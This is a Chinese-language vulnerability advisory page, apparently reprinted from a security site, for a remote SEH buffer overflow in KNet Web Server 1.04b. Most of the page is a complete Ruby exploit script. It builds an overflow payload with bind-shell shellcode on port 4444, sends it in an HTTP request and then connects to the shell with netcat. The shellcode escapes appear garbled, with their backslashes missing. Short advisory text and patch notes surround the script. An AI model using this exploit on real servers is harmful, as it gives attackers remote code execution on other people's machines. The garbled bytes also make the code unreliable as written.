发布日期:2013-03-29
更新日期:2013-04-02受影响系统:
KNet Web Server KNet Web Server
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58781
KNet Web Server是小型的Web服务器。
KNet 1.04b 及其他版本存在远程缓冲区溢出,利用漏洞攻击异常处理过程(SEH),将shell绑定到端口4444,导致在应用的上下文中执行任意代码。
<*来源:Myo Soe
链接:http://packetstormsecurity.com/files/120964/KNet-Web-Server-Buffer-Overflow.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/ruby # Exploit Title: KNet Web Server Buffer Overflow SEH
# Date: 2013-03-27
# Exploit Author: Myo Soe, http://yehg.net/
# Software Link: http://www.softpedia.com/progDownload/KNet-Download-20137.html
# Version: KNet 1.04b
# Tested on: Windows 7 require "net/http"
require "uri"
require "socket"
############################################ # bind port 4444
sc_bind =
"xbdx0ex27x05xabxdaxdbxd9x74x24xf4x5ax33xc9" +
"xb1x56x83xc2x04x31x6ax0fx03x6ax01xc5xf0x57" +
"xf5x80xfbxa7x05xf3x72x42x34x21xe0x06x64xf5" +
"x62x4ax84x7ex26x7fx1fxf2xefx70xa8xb9xc9xbf" +
"x29x0cxd6x6cxe9x0exaax6ex3dxf1x93xa0x30xf0" +
"xd4xddxbaxa0x8dxaax68x55xb9xefxb0x54x6dx64" +
"x88x2ex08xbbx7cx85x13xecx2cx92x5cx14x47xfc" +
"x7cx25x84x1ex40x6cxa1xd5x32x6fx63x24xbax41" +
"x4bxebx85x6dx46xf5xc2x4axb8x80x38xa9x45x93" +
"xfaxd3x91x16x1fx73x52x80xfbx85xb7x57x8fx8a" +
"x7cx13xd7x8ex83xf0x63xaax08xf7xa3x3ax4axdc" +
"x67x66x09x7dx31xc2xfcx82x21xaaxa1x26x29x59" +
"xb6x51x70x36x7bx6cx8bxc6x13xe7xf8xf4xbcx53" +
"x97xb4x35x7ax60xbax6cx3axfex45x8ex3bxd6x81" +
"xdax6bx40x23x62xe0x90xccxb7xa7xc0x62x67x08" +
"xb1xc2xd7xe0xdbxccx08x10xe4x06x3fx16x2ax72" +
"x6cxf1x4fx84x83x5dxd9x62xc9x4dx8fx3dx65xac" +
"xf4xf5x12xcfxdexa9x8bx47x56xa4x0bx67x67xe2" +
"x38xc4xcfx65xcax06xd4x94xcdx02x7cxdexf6xc5" +
"xf6x8exb5x74x06x9bx2dx14x95x40xadx53x86xde" +
"xfax34x78x17x6exa9x23x81x8cx30xb5xeax14xef" +
"x06xf4x95x62x32xd2x85xbaxbbx5exf1x12xeax08" +
"xafxd4x44xfbx19x8fx3bx55xcdx56x70x66x8bx56" +
"x5dx10x73xe6x08x65x8cxc7xdcx61xf5x35x7dx8d" +
"x2cxfex8dxc4x6cx57x06x81xe5xe5x4bx32xd0x2a" +
"x72xb1xd0xd2x81xa9x91xd7xcex6dx4axaax5fx18" +
"x6cx19x5fx09" ###########################################
sploit = "x90" * 1234
sploit += "xFFx64x24x5C" # nseh | JMP [ESP+5C] FF6424 5C ; will jump to Shell Code at ESP+5C
sploit += "xE3x74x24x6C" # seh | Found pop esi - pop ebp - ret at 0x6C2474E3 [crtdll.dll]
sploit += "x90" * 80sploit += sc_bind
sploit += "x90" * 80 ######################################## puts "KNet Web Server - Buffer Overflow SEH Exploit
by Myo Soe, http://yehg.net/
"
target = ARGV[0] def exploit(t,s)
target = "http://" + t
sploit = s
puts "[*] Sending exploit to #{target}...
"
url = URI.parse(target)
res = Net::HTTP.start(url.host, url.port) {|http|
http.get("/" + sploit)
}
end
def connect(t)
sleep(1)
target = t
puts "[*] Opening Shell ..
";
system("nc #{target} 4444")
end
t1=Thread.new{exploit(target,sploit)}
t2=Thread.new{connect(target)}
t1.join
t2.join建议:
--------------------------------------------------------------------------------
厂商补丁:
KNet Web Server
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.softpedia.com/get/Internet/Servers/WEB-Servers/KNet.shtmlngIRCd 远程拒绝服务漏洞(CVE-2013-1747)NetGear WNR1000路由器远程身份验证绕过漏洞相关资讯 KNet 本文评论 查看全部评论 (0)
尊重网上道德,遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内转载或引用您的评论 参与本评论即表明您已经阅读并接受上述条款
收藏该网址
易网时代-编程资源站